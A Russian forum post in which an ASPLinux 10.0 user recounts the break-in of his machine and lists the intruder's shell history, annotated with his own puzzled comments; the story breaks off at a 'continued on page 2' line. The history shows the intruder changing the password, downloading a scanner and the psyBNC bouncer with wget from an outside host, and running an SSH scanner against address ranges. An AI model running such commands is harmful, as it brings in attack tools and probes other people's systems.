Клуб любителей ASPLinux

История одного красивого взлома ASPLinux 10.0

или "Пособие для начинающего хакера"

Уже писал аннотацию этой детективной истории, а сегодня что-то стал раздумывать, стоит ли заниматься этим возможно бесполезным занятием? Ведь знаменитый Линукс был взломан всего за пару часов, не проще ли вернуться на винду и спокойно продолжать в ней работать? Тем более что писанины и материалов на эту скопилось много.
В итоге, раз пообещал, решил все же написать, может, пригодится народу. В линуксе по большому счету считаю себя профаном, но в так нелюбимой здесь винде кое-что соображаю, поэтому отчасти понял, что произошло. Пока излагаю только голые факты, вопросы задавать буду потом.
Итак, приступим

Часть 1

Работал раньше в Линуксе немного, ставил раньше его несколько раз, в основном Мандрейки и Редхаты, поигрался да возвращался на виндовс - несерьезные какие-то они, для моделистов-конструкторов, но не для работы. А когда взял поиграться ASPLinux 10.0, понравилось - установка прошла без одной запинки, все заработало сразу и вид имеет человеческий. Проводил всякие безобидные эксперименты типа установки Open Office да лазил по Internet.
Отмечу, что когда проводил установку, было предложено настроить файрвол. После некоторых раздумий я позапрещал все предложенные протоколы, поснимав соответствующие галки на протоколах и больше к этому вопросу не возвращался, полагая, что установлена самая максимальная зашита из возможного, что предлагает ASPLinux. Как затем выяснилось, это были мои наивные предположения

Вот так я работал несколько месяцев, как вдруг, вчера, находяся в Internet, мне чего-то занадобилось поправить под рутом. Залез в консоль, ввел рута, пароль - как вдруг - облом, не пущает. Понятно, не ту педаль на клаве нажал - еще раз, - и снова не пускает! Опана, это еще за сюрприз?! Может, пароль забыл? Пошарил в записях - нет, все правильно :-o Что еще можно сделать? Взял да и перезагрузился - но эффект стабильный, как курс долара в течении часа. Это уже называется картина маслом "Приплыли :-(". Поскольку, как возвращать утеряный пароль у меня никакого опыта нет, к тому же какого &^%$ он поменялся - наверняка ASPLinux глюкавый, не иначе! Хотя - может и вирус нашкодил, хотя говорят, нет вирусов в линуксе, может, появились уже?
Пока я проводил время в грустных размышлениях, меланхолично нажимая в консоли стрелки "вверх-вниз", как вдруг увидел (благодаря им) в хистори консольных команд какую-то чудную неизвестную мне команду w. Заинтересовавшись, начал просматривать все консольные команды - елы-палы, да тут таких незвестных команд полно!!! Кто же их выдавал-то?!! Уж никак не я - я таких команд совсем не знаю!!! Вот у меня волосы стали шевелиться - что происходит?!!
Смотрите сами - вот эти команды (коментарии, где понял ситуацию, мои):

1 ls осмотрелся
2 cd Desktop
3 ls осмотрелся на рабочем столе
4 ls
5 w ознакомился с пользователями
6 passwd видать, сменил пароль? Но чей?
7 cat /proc/cpuinfo поглядел на железо
8 cd /var/tmp
9 ls
10 mkdir scan свил гнездо для хакерской проги
11 cd scan
12 wget jonny.ro/wow.tgz залил хакерскую прогу №1
13 cd ..
14 mkdir bnc свил гнездо для хакерской проги №2
15 cd bnc
16 wget jonny.ro/psyBNC2.3.1.tar.gz залил хакерскую прогу №2
17 tar -zxvf psyBNC2.3.1.tar.gz разахивировал хакерскую прогу №2
18 cat /etc/issue
19 cd psybnc
20 make откомпилял хакерскую прогу №2 (вот гад!)
21 ./psybnc
22 ps -aux
23 kill -9 9952 убил какой-то процесс
24 cd ..
25 cd ..
26 cd scan/ssh
27 ./assh 212.144
28 cd scan
29 cd ssh
30 ls
31 tar -zxvf wow.gz ошибся малость
32 tar -zxvf wow.tgz разархивировал хакерскую прогу №1
33 cd ssh
34 ./assh 212.144 здесь и далее мне непонятно
35 ./assh 214.162
36 ./assh 214.168
37 ./assh 214.145
38 ./assh 210.144
39 ls
40 w
41 uptime
42 ls
43 cd desktop
44 w
45 kill
46 passwd
47 w
48 -bash
49 cd
50 cd /var/tmp/scan/ssh
51 ./assh 195.233
52 ./assh 212.167
53 whoami
54 ./assh 195.28
55 ls
56 cd mbox
57 w
58 exit
59 passwd
60 exit засим откланялся

(продолжение на 2-й странице)